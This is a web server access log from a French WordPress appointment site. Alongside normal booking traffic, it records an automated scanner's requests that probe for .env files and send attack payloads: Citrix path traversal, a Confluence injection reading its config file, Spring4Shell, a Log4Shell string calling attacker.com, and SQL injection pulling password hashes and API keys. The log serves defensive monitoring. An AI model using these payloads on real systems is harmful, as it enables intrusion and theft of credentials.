88.187.164.56 - - [14/Sep/2026:12:57:44 +0200] "GET /wp/wp-content/uploads/fbrfg/favicon-32x32.png HTTP/1.1" 404 146095 "-" "Dalvik/2.1.0 (Linux; U; Android 17; Pixel 8a Build/CP2A.260805.005)"
92.184.125.201 - - [14/Sep/2026:12:57:47 +0200] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 16 "https://lecocondalfred.fr/prendre-rendez-vous/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.0.0 Mobile Safari/537.36"
182.177.125.94 - - [14/Sep/2026:12:57:48 +0200] "POST /xmlrpc.php HTTP/1.1" 503 18037 "-" "Jetpack/12.0; WordPress/6.2; http://site97549886.com"
182.177.125.94 - - [14/Sep/2026:12:57:48 +0200] "POST /xmlrpc.php HTTP/1.1" 503 18037 "-" "Jetpack/12.0; WordPress/6.2; http://site97549886.com"
92.184.125.201 - - [14/Sep/2026:12:57:47 +0200] "GET /wp-admin/admin-ajax.php?action=bookly_render_time&form_id=700a67657f2cb05383b2d552704177f2&csrf_token=4d0610f653 HTTP/1.1" 200 8603 "https://lecocondalfred.fr/prendre-rendez-vous/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.0.0 Mobile Safari/537.36"
92.184.125.201 - - [14/Sep/2026:12:57:51 +0200] "GET /wp-admin/admin-ajax.php?action=bookly_render_time&form_id=700a67657f2cb05383b2d552704177f2&selected_date=2026-11-01&dir=prev&csrf_token=4d0610f653 HTTP/1.1" 200 8611 "https://lecocondalfred.fr/prendre-rendez-vous/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.0.0 Mobile Safari/537.36"
172.56.170.247 - - [14/Sep/2026:12:57:53 +0200] "POST /xmlrpc.php HTTP/1.1" 503 18037 "-" "WordPress.com; https://wordpress.com"
172.56.170.247 - - [14/Sep/2026:12:57:53 +0200] "POST /xmlrpc.php HTTP/1.1" 503 18037 "-" "WordPress.com; https://wordpress.com"
109.234.165.65 - - [14/Sep/2026:12:57:56 +0200] "POST /wp-cron.php?doing_wp_cron=1789383476.2387499809265136718750 HTTP/1.1" 200 - "-" "WordPress/7.1; https://lecocondalfred.fr"
109.234.165.65 - - [14/Sep/2026:12:57:55 +0200] "POST /?wordfence_syncAttackData=1789383475.7716 HTTP/1.1" 200 - "-" "WordPress/7.1; https://lecocondalfred.fr"
92.184.125.201 - - [14/Sep/2026:12:57:55 +0200] "GET /wp-admin/admin-ajax.php?action=bookly_render_time&form_id=700a67657f2cb05383b2d552704177f2&selected_date=2027-01-01&dir=next&csrf_token=4d0610f653 HTTP/1.1" 200 12273 "https://lecocondalfred.fr/prendre-rendez-vous/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.0.0 Mobile Safari/537.36"
182.177.125.94 - - [14/Sep/2026:12:57:58 +0200] "POST /xmlrpc.php HTTP/1.1" 503 18037 "-" "Jetpack by WordPress.com (Jetpack 12.0; WordPress 6.4)"
182.177.125.94 - - [14/Sep/2026:12:57:58 +0200] "POST /xmlrpc.php HTTP/1.1" 503 18037 "-" "Jetpack by WordPress.com (Jetpack 12.0; WordPress 6.4)"
92.184.125.201 - - [14/Sep/2026:12:57:58 +0200] "GET /wp-admin/admin-ajax.php?action=bookly_render_time&form_id=700a67657f2cb05383b2d552704177f2&selected_date=2026-12-01&dir=prev&csrf_token=4d0610f653 HTTP/1.1" 200 8611 "https://lecocondalfred.fr/prendre-rendez-vous/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.0.0 Mobile Safari/537.36"
144.172.114.51 - - [14/Sep/2026:12:57:58 +0200] "GET /database.yml HTTP/1.1" 404 138358 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
92.184.125.201 - - [14/Sep/2026:12:58:00 +0200] "GET /wp-admin/admin-ajax.php?action=bookly_render_time&form_id=700a67657f2cb05383b2d552704177f2&selected_date=2026-11-01&dir=prev&csrf_token=4d0610f653 HTTP/1.1" 200 8611 "https://lecocondalfred.fr/prendre-rendez-vous/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.0.0 Mobile Safari/537.36"
144.172.114.51 - - [14/Sep/2026:12:58:01 +0200] "GET /config/database.json HTTP/1.1" 404 138370 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
172.56.170.247 - - [14/Sep/2026:12:58:04 +0200] "POST /xmlrpc.php HTTP/1.1" 503 18037 "-" "Jetpack/13.0; WordPress/6.3; http://site46776014.com"
172.56.170.247 - - [14/Sep/2026:12:58:04 +0200] "POST /xmlrpc.php HTTP/1.1" 503 18037 "-" "Jetpack/13.0; WordPress/6.3; http://site46776014.com"
109.234.165.65 - - [14/Sep/2026:12:58:06 +0200] "POST /wp-cron.php?doing_wp_cron=1789383486.0367200374603271484375 HTTP/1.1" 200 - "-" "WordPress/7.1; https://lecocondalfred.fr"
109.234.165.65 - - [14/Sep/2026:12:58:05 +0200] "POST /?wordfence_syncAttackData=1789383485.5433 HTTP/1.1" 200 - "-" "WordPress/7.1; https://lecocondalfred.fr"
144.172.114.51 - - [14/Sep/2026:12:58:05 +0200] "GET /administrator/.env HTTP/1.1" 404 138370 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
182.177.125.94 - - [14/Sep/2026:12:58:09 +0200] "POST /xmlrpc.php HTTP/1.1" 503 18037 "-" "WordPress.com; https://wordpress.com"
182.177.125.94 - - [14/Sep/2026:12:58:09 +0200] "POST /xmlrpc.php HTTP/1.1" 503 18037 "-" "WordPress.com; https://wordpress.com"
92.184.125.201 - - [14/Sep/2026:12:58:12 +0200] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 16 "https://lecocondalfred.fr/prendre-rendez-vous/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.0.0 Mobile Safari/537.36"
92.184.125.201 - - [14/Sep/2026:12:58:13 +0200] "GET /wp-admin/admin-ajax.php?action=bookly_render_details&form_id=700a67657f2cb05383b2d552704177f2&add_to_cart=true&csrf_token=4d0610f653 HTTP/1.1" 200 5397 "https://lecocondalfred.fr/prendre-rendez-vous/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.0.0 Mobile Safari/537.36"
144.172.114.51 - - [14/Sep/2026:12:58:14 +0200] "GET /portal/.env HTTP/1.1" 404 138358 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
172.56.170.247 - - [14/Sep/2026:12:58:14 +0200] "POST /xmlrpc.php HTTP/1.1" 503 18037 "-" "Jetpack by WordPress.com (Jetpack 13.0; WordPress 6.2)"
172.56.170.247 - - [14/Sep/2026:12:58:14 +0200] "POST /xmlrpc.php HTTP/1.1" 503 18037 "-" "Jetpack by WordPress.com (Jetpack 13.0; WordPress 6.2)"
109.234.165.65 - - [14/Sep/2026:12:58:19 +0200] "POST /?wordfence_syncAttackData=1789383499.227 HTTP/1.1" 200 - "-" "WordPress/7.1; https://lecocondalfred.fr"
109.234.165.65 - - [14/Sep/2026:12:58:19 +0200] "POST /?wordfence_syncAttackData=1789383499.3772 HTTP/1.1" 200 233955 "-" "WordPress/7.1; https://lecocondalfred.fr"
109.234.165.65 - - [14/Sep/2026:12:58:19 +0200] "POST /?wordfence_syncAttackData=1789383499.3771 HTTP/1.1" 200 233955 "-" "WordPress/7.1; https://lecocondalfred.fr"
144.172.114.51 - - [14/Sep/2026:12:58:18 +0200] "GET /dashboard/.env HTTP/1.1" 404 138362 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
182.177.125.94 - - [14/Sep/2026:12:58:19 +0200] "POST /xmlrpc.php HTTP/1.1" 404 138354 "-" "Jetpack/12.0; WordPress/6.1; http://site58530955.com"
92.184.125.201 - - [14/Sep/2026:12:58:19 +0200] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 16 "https://lecocondalfred.fr/prendre-rendez-vous/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.0.0 Mobile Safari/537.36"
182.177.125.94 - - [14/Sep/2026:12:58:19 +0200] "POST /xmlrpc.php HTTP/1.1" 404 138354 "-" "Jetpack/12.0; WordPress/6.1; http://site58530955.com"
92.184.125.201 - - [14/Sep/2026:12:58:20 +0200] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 32 "https://lecocondalfred.fr/prendre-rendez-vous/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.0.0 Mobile Safari/537.36"
144.172.114.51 - - [14/Sep/2026:12:58:21 +0200] "GET /crm/.env HTTP/1.1" 404 138354 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
92.184.125.201 - - [14/Sep/2026:12:58:21 +0200] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 16 "https://lecocondalfred.fr/prendre-rendez-vous/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.0.0 Mobile Safari/537.36"
92.184.125.201 - - [14/Sep/2026:12:58:22 +0200] "GET /wp-admin/admin-ajax.php?action=bookly_render_complete&form_id=700a67657f2cb05383b2d552704177f2&csrf_token=4d0610f653 HTTP/1.1" 200 1486 "https://lecocondalfred.fr/prendre-rendez-vous/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.0.0 Mobile Safari/537.36"
172.56.170.247 - - [14/Sep/2026:12:58:25 +0200] "POST /xmlrpc.php HTTP/1.1" 503 18037 "-" "Jetpack by WordPress.com"
172.56.170.247 - - [14/Sep/2026:12:58:25 +0200] "POST /xmlrpc.php HTTP/1.1" 503 18037 "-" "Jetpack by WordPress.com"
144.172.114.51 - - [14/Sep/2026:12:58:25 +0200] "GET /mail/.env HTTP/1.1" 404 138358 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
109.234.165.65 - - [14/Sep/2026:12:58:28 +0200] "POST /?wordfence_syncAttackData=1789383508.1868 HTTP/1.1" 200 - "-" "WordPress/7.1; https://lecocondalfred.fr"
144.172.114.51 - - [14/Sep/2026:12:58:27 +0200] "GET /mailer/.env HTTP/1.1" 404 138358 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
182.177.125.94 - - [14/Sep/2026:12:58:30 +0200] "POST /xmlrpc.php HTTP/1.1" 404 138354 "-" "Jetpack by WordPress.com"
182.177.125.94 - - [14/Sep/2026:12:58:30 +0200] "POST /xmlrpc.php HTTP/1.1" 404 138354 "-" "Jetpack by WordPress.com"
144.172.114.51 - - [14/Sep/2026:12:58:31 +0200] "GET /deployment/.env HTTP/1.1" 404 138366 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
144.172.114.51 - - [14/Sep/2026:12:58:33 +0200] "GET /docker/.env HTTP/1.1" 404 138358 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
172.56.170.247 - - [14/Sep/2026:12:58:36 +0200] "POST /xmlrpc.php HTTP/1.1" 503 18037 "-" "Jetpack by WordPress.com (Jetpack 12.1; WordPress 6.2)"
172.56.170.247 - - [14/Sep/2026:12:58:36 +0200] "POST /xmlrpc.php HTTP/1.1" 503 18037 "-" "Jetpack by WordPress.com (Jetpack 12.1; WordPress 6.2)"
109.234.165.65 - - [14/Sep/2026:12:58:40 +0200] "POST /?wordfence_syncAttackData=1789383520.5233 HTTP/1.1" 200 - "-" "WordPress/7.1; https://lecocondalfred.fr"
109.234.165.65 - - [14/Sep/2026:12:58:40 +0200] "POST /?wordfence_syncAttackData=1789383520.5233 HTTP/1.1" 200 - "-" "WordPress/7.1; https://lecocondalfred.fr"
182.177.125.94 - - [14/Sep/2026:12:58:40 +0200] "POST /xmlrpc.php HTTP/1.1" 404 138354 "-" "Jetpack by WordPress.com"
182.177.125.94 - - [14/Sep/2026:12:58:40 +0200] "POST /xmlrpc.php HTTP/1.1" 404 138354 "-" "Jetpack by WordPress.com"
172.56.170.247 - - [14/Sep/2026:12:58:47 +0200] "POST /xmlrpc.php HTTP/1.1" 503 18037 "-" "WordPress.com; https://wordpress.com"
172.56.170.247 - - [14/Sep/2026:12:58:47 +0200] "POST /xmlrpc.php HTTP/1.1" 503 18037 "-" "WordPress.com; https://wordpress.com"
109.234.165.65 - - [14/Sep/2026:12:58:52 +0200] "POST /wp-cron.php?doing_wp_cron=1789383532.0764179229736328125000 HTTP/1.1" 200 - "-" "WordPress/7.1; https://lecocondalfred.fr"
109.234.165.65 - - [14/Sep/2026:12:58:51 +0200] "POST /?wordfence_syncAttackData=1789383531.636 HTTP/1.1" 200 - "-" "WordPress/7.1; https://lecocondalfred.fr"
109.234.165.65 - - [14/Sep/2026:12:58:51 +0200] "POST /?wordfence_syncAttackData=1789383531.636 HTTP/1.1" 200 - "-" "WordPress/7.1; https://lecocondalfred.fr"
182.177.125.94 - - [14/Sep/2026:12:58:51 +0200] "POST /xmlrpc.php HTTP/1.1" 404 138354 "-" "Jetpack by WordPress.com"
182.177.125.94 - - [14/Sep/2026:12:58:51 +0200] "POST /xmlrpc.php HTTP/1.1" 404 138354 "-" "Jetpack by WordPress.com"
172.56.170.247 - - [14/Sep/2026:12:58:58 +0200] "POST /xmlrpc.php HTTP/1.1" 503 18037 "-" "Jetpack by WordPress.com (Jetpack 12.5; WordPress 6.3)"
172.56.170.247 - - [14/Sep/2026:12:58:58 +0200] "POST /xmlrpc.php HTTP/1.1" 503 18037 "-" "Jetpack by WordPress.com (Jetpack 12.5; WordPress 6.3)"
172.56.170.247 - - [14/Sep/2026:12:59:09 +0200] "POST /xmlrpc.php HTTP/1.1" 503 18037 "-" "Jetpack by WordPress.com"
172.56.170.247 - - [14/Sep/2026:12:59:09 +0200] "POST /xmlrpc.php HTTP/1.1" 503 18037 "-" "Jetpack by WordPress.com"
172.56.170.247 - - [14/Sep/2026:12:59:19 +0200] "POST /xmlrpc.php HTTP/1.1" 503 18037 "-" "Jetpack by WordPress.com (Jetpack 12.5; WordPress 6.3)"
172.56.170.247 - - [14/Sep/2026:12:59:19 +0200] "POST /xmlrpc.php HTTP/1.1" 503 18037 "-" "Jetpack by WordPress.com (Jetpack 12.5; WordPress 6.3)"
172.56.170.247 - - [14/Sep/2026:12:59:30 +0200] "POST /xmlrpc.php HTTP/1.1" 503 18037 "-" "Jetpack/13.0; WordPress/6.2; http://site32806366.com"
172.56.170.247 - - [14/Sep/2026:12:59:30 +0200] "POST /xmlrpc.php HTTP/1.1" 503 18037 "-" "Jetpack/13.0; WordPress/6.2; http://site32806366.com"
172.56.170.247 - - [14/Sep/2026:12:59:41 +0200] "POST /xmlrpc.php HTTP/1.1" 503 18037 "-" "Jetpack by WordPress.com (Jetpack 13.0; WordPress 6.4)"
172.56.170.247 - - [14/Sep/2026:12:59:41 +0200] "POST /xmlrpc.php HTTP/1.1" 503 18037 "-" "Jetpack by WordPress.com (Jetpack 13.0; WordPress 6.4)"
172.56.170.247 - - [14/Sep/2026:12:59:52 +0200] "POST /xmlrpc.php HTTP/1.1" 503 18037 "-" "Jetpack by WordPress.com"
172.56.170.247 - - [14/Sep/2026:12:59:52 +0200] "POST /xmlrpc.php HTTP/1.1" 503 18037 "-" "Jetpack by WordPress.com"
109.234.165.65 - - [14/Sep/2026:13:00:01 +0200] "GET /wp-cron.php HTTP/1.1" 200 - "-" "Wget/1.19.5 (linux-gnu)"
109.234.165.65 - - [14/Sep/2026:13:00:03 +0200] "POST /wp-cron.php?doing_wp_cron=1789383603.5566360950469970703125 HTTP/1.1" 200 - "-" "WordPress/7.1; https://lecocondalfred.fr"
109.234.165.65 - - [14/Sep/2026:13:00:02 +0200] "POST /?wordfence_syncAttackData=1789383602.127 HTTP/1.1" 200 - "-" "WordPress/7.1; https://lecocondalfred.fr"
172.56.170.247 - - [14/Sep/2026:13:00:03 +0200] "POST /xmlrpc.php HTTP/1.1" 503 18037 "-" "Jetpack by WordPress.com (Jetpack 12.0; WordPress 6.1)"
172.56.170.247 - - [14/Sep/2026:13:00:03 +0200] "POST /xmlrpc.php HTTP/1.1" 503 18037 "-" "Jetpack by WordPress.com (Jetpack 12.0; WordPress 6.1)"
172.56.170.247 - - [14/Sep/2026:13:00:14 +0200] "POST /xmlrpc.php HTTP/1.1" 503 18037 "-" "Jetpack by WordPress.com (Jetpack 13.0; WordPress 6.3)"
172.56.170.247 - - [14/Sep/2026:13:00:14 +0200] "POST /xmlrpc.php HTTP/1.1" 503 18037 "-" "Jetpack by WordPress.com (Jetpack 13.0; WordPress 6.3)"
172.56.170.247 - - [14/Sep/2026:13:00:25 +0200] "POST /xmlrpc.php HTTP/1.1" 503 18037 "-" "Jetpack by WordPress.com (Jetpack 12.1; WordPress 6.4)"
172.56.170.247 - - [14/Sep/2026:13:00:25 +0200] "POST /xmlrpc.php HTTP/1.1" 503 18037 "-" "Jetpack by WordPress.com (Jetpack 12.1; WordPress 6.4)"
172.56.170.247 - - [14/Sep/2026:13:00:36 +0200] "POST /xmlrpc.php HTTP/1.1" 503 18037 "-" "WordPress.com; https://wordpress.com"
172.56.170.247 - - [14/Sep/2026:13:00:36 +0200] "POST /xmlrpc.php HTTP/1.1" 503 18037 "-" "WordPress.com; https://wordpress.com"
109.234.165.65 - - [14/Sep/2026:13:00:38 +0200] "POST /wp-cron.php?doing_wp_cron=1789383638.0033700466156005859375 HTTP/1.1" 200 - "-" "WordPress/7.1; https://lecocondalfred.fr"
109.234.165.65 - - [14/Sep/2026:13:00:37 +0200] "POST /?wordfence_syncAttackData=1789383637.4913 HTTP/1.1" 200 - "-" "WordPress/7.1; https://lecocondalfred.fr"
144.172.114.51 - - [14/Sep/2026:13:00:37 +0200] "GET /nginx_status HTTP/1.1" 404 138358 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
144.172.114.51 - - [14/Sep/2026:13:00:38 +0200] "GET /api/index.php/v1/config/application?public=true HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
144.172.114.51 - - [14/Sep/2026:13:00:39 +0200] "GET /owa/auth/x.js HTTP/1.1" 404 146012 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
144.172.114.51 - - [14/Sep/2026:13:00:40 +0200] "GET /ecp/ HTTP/1.1" 404 138350 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
144.172.114.51 - - [14/Sep/2026:13:00:41 +0200] "GET /autodiscover/autodiscover.json HTTP/1.1" 404 138386 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
144.172.114.51 - - [14/Sep/2026:13:00:42 +0200] "GET /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1" 404 146072 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
144.172.114.51 - - [14/Sep/2026:13:00:43 +0200] "GET /vpn/../vpns/portal/scripts/ HTTP/1.1" 404 146060 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
144.172.114.51 - - [14/Sep/2026:13:00:44 +0200] "GET /mgmt/tm/util/bash HTTP/1.1" 403 17008 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
144.172.114.51 - - [14/Sep/2026:13:00:45 +0200] "GET /mgmt/tm/util/ HTTP/1.1" 403 17008 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
144.172.114.51 - - [14/Sep/2026:13:00:46 +0200] "GET /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua HTTP/1.1" 404 138454 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
172.56.170.247 - - [14/Sep/2026:13:00:47 +0200] "POST /xmlrpc.php HTTP/1.1" 503 18037 "-" "WordPress.com; https://wordpress.com"
172.56.170.247 - - [14/Sep/2026:13:00:47 +0200] "POST /xmlrpc.php HTTP/1.1" 503 18037 "-" "WordPress.com; https://wordpress.com"
109.234.165.65 - - [14/Sep/2026:13:00:47 +0200] "POST /?wordfence_syncAttackData=1789383647.3482 HTTP/1.1" 200 - "-" "WordPress/7.1; https://lecocondalfred.fr"
144.172.114.51 - - [14/Sep/2026:13:00:47 +0200] "GET /ui/vropspluginui/rest/services/uploadova HTTP/1.1" 404 146076 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
144.172.114.51 - - [14/Sep/2026:13:00:48 +0200] "GET /fileupload/toolsAny HTTP/1.1" 404 138370 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
144.172.114.51 - - [14/Sep/2026:13:00:49 +0200] "GET /pages/doenterpagevariables.action HTTP/1.1" 404 138390 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
144.172.114.51 - - [14/Sep/2026:13:00:50 +0200] "GET /$%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%27nashorn%27%29.eval%28%27cat%20confluence.cfg.xml%27%29%7D/ HTTP/1.1" 404 138554 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
144.172.114.51 - - [14/Sep/2026:13:00:51 +0200] "GET /rest/api/latest/projects HTTP/1.1" 404 146052 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
144.172.114.51 - - [14/Sep/2026:13:00:52 +0200] "GET /?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7b...%7di HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
144.172.114.51 - - [14/Sep/2026:13:00:53 +0200] "GET /tomcatwar.jsp HTTP/1.1" 404 138358 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
144.172.114.51 - - [14/Sep/2026:13:00:54 +0200] "GET /actuator/gateway/refresh HTTP/1.1" 404 146048 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
109.234.165.65 - - [14/Sep/2026:13:00:56 +0200] "POST /wp-cron.php?doing_wp_cron=1789383656.1681079864501953125000 HTTP/1.1" 200 - "-" "WordPress/7.1; https://lecocondalfred.fr"
144.172.114.51 - - [14/Sep/2026:13:00:55 +0200] "GET /ztp/cgi-bin/handler HTTP/1.1" 404 146044 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
144.172.114.51 - - [14/Sep/2026:13:00:56 +0200] "GET /geoserver/ows?service=wfs&version=2.0.0&request=GetPropertyValue HTTP/1.1" 404 138438 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
144.172.114.51 - - [14/Sep/2026:13:00:57 +0200] "GET /console/console.portal HTTP/1.1" 404 138374 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
42.193.171.36 - - [14/Sep/2026:13:00:58 +0200] "GET / HTTP/1.1" 200 224621 "https://m.baidu.com/s?word=www.qgxsyg.cn" "Mozilla/5.0 (Linux; Android 9; MI 6 Build/PKQ1.190118.001; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/76.0.3809.89 Mobile Safari/537.36 T7/11.19 SP-engine/2.14.0 baiduboxapp/11.19.0.0 (Baidu; P1 9)"
172.56.170.247 - - [14/Sep/2026:13:00:58 +0200] "POST /xmlrpc.php HTTP/1.1" 503 18037 "-" "Jetpack by WordPress.com (Jetpack 12.5; WordPress 6.4)"
172.56.170.247 - - [14/Sep/2026:13:00:58 +0200] "POST /xmlrpc.php HTTP/1.1" 503 18037 "-" "Jetpack by WordPress.com (Jetpack 12.5; WordPress 6.4)"
109.234.165.65 - - [14/Sep/2026:13:00:58 +0200] "POST /?wordfence_syncAttackData=1789383658.89 HTTP/1.1" 200 - "-" "WordPress/7.1; https://lecocondalfred.fr"
144.172.114.51 - - [14/Sep/2026:13:00:58 +0200] "GET /*.action HTTP/1.1" 404 138354 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
144.172.114.51 - - [14/Sep/2026:13:01:00 +0200] "GET /*.do HTTP/1.1" 404 138350 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
144.172.114.51 - - [14/Sep/2026:13:01:01 +0200] "GET /?name=%{( HTTP/1.1" 404 138338 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
144.172.114.51 - - [14/Sep/2026:13:01:02 +0200] "GET /*.jsp/ HTTP/1.1" 404 138354 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
144.172.114.51 - - [14/Sep/2026:13:01:03 +0200] "GET /manager/html HTTP/1.1" 404 138362 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
109.234.165.65 - - [14/Sep/2026:13:01:05 +0200] "POST /wp-cron.php?doing_wp_cron=1789383665.6085469722747802734375 HTTP/1.1" 200 - "-" "WordPress/7.1; https://lecocondalfred.fr"
144.172.114.51 - - [14/Sep/2026:13:01:04 +0200] "GET /WEB-INF/web.xml HTTP/1.1" 404 138366 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
144.172.114.51 - - [14/Sep/2026:13:01:06 +0200] "GET /?payload=${jndi:ldap://attacker.com/a} HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
172.56.170.247 - - [14/Sep/2026:13:01:09 +0200] "POST /xmlrpc.php HTTP/1.1" 503 18037 "-" "WordPress.com; https://wordpress.com"
172.56.170.247 - - [14/Sep/2026:13:01:09 +0200] "POST /xmlrpc.php HTTP/1.1" 503 18037 "-" "WordPress.com; https://wordpress.com"
109.234.165.65 - - [14/Sep/2026:13:01:11 +0200] "POST /?wordfence_syncAttackData=1789383671.9271 HTTP/1.1" 200 - "-" "WordPress/7.1; https://lecocondalfred.fr"
144.172.114.51 - - [14/Sep/2026:13:01:11 +0200] "GET /wp-content/plugins/ultra/admin/options.php?action=edit&id=1%27+UNION+SELECT+user_login%2Cuser_pass%2Cuser_email+FROM+wp_users--+- HTTP/1.1" 404 146212 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
144.172.114.51 - - [14/Sep/2026:13:01:13 +0200] "GET /wp-content/plugins/ultra/admin/options.php?action=edit&id=1%27+UNION+SELECT+option_name%2Coption_value%2Cautoload+FROM+wp_options+WHERE+option_name+LIKE+%27%25key%25%27--+- HTTP/1.1" 404 146292 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
144.172.114.51 - - [14/Sep/2026:13:01:14 +0200] "GET /wp-content/plugins/ultra/admin/options.php?action=edit&id=1%27+UNION+SELECT+meta_key%2Cmeta_value%2Cuser_id+FROM+wp_usermeta+WHERE+meta_key+LIKE+%27%25api%25%27--+- HTTP/1.1" 404 146280 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
144.172.114.51 - - [14/Sep/2026:13:01:15 +0200] "GET /wp-admin/admin-ajax.php?action=ultra_get_option&id=1%27+UNION+SELECT+user_login%2Cuser_pass%2Cuser_email+FROM+wp_users--+- HTTP/1.1" 404 138526 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
144.172.114.51 - - [14/Sep/2026:13:01:16 +0200] "GET /wp-admin/admin-ajax.php?action=ultra_get_option&id=1%27+UNION+SELECT+option_name%2Coption_value%2Cautoload+FROM+wp_options+WHERE+option_name+LIKE+%27%25key%25%27--+- HTTP/1.1" 404 138606 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
144.172.114.51 - - [14/Sep/2026:13:01:17 +0200] "GET /wp-admin/admin-ajax.php?action=ultra_get_option&id=1%27+UNION+SELECT+meta_key%2Cmeta_value%2Cuser_id+FROM+wp_usermeta+WHERE+meta_key+LIKE+%27%25api%25%27--+- HTTP/1.1" 404 138594 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
144.172.114.51 - - [14/Sep/2026:13:01:18 +0200] "GET /wp-content/plugins/ultra/includes/ajax.php?action=get_option&id=1%27+UNION+SELECT+user_login%2Cuser_pass%2Cuser_email+FROM+wp_users--+- HTTP/1.1" 404 146220 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
144.172.114.51 - - [14/Sep/2026:13:01:19 +0200] "GET /wp-content/plugins/ultra/includes/ajax.php?action=get_option&id=1%27+UNION+SELECT+option_name%2Coption_value%2Cautoload+FROM+wp_options+WHERE+option_name+LIKE+%27%25key%25%27--+- HTTP/1.1" 404 146300 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
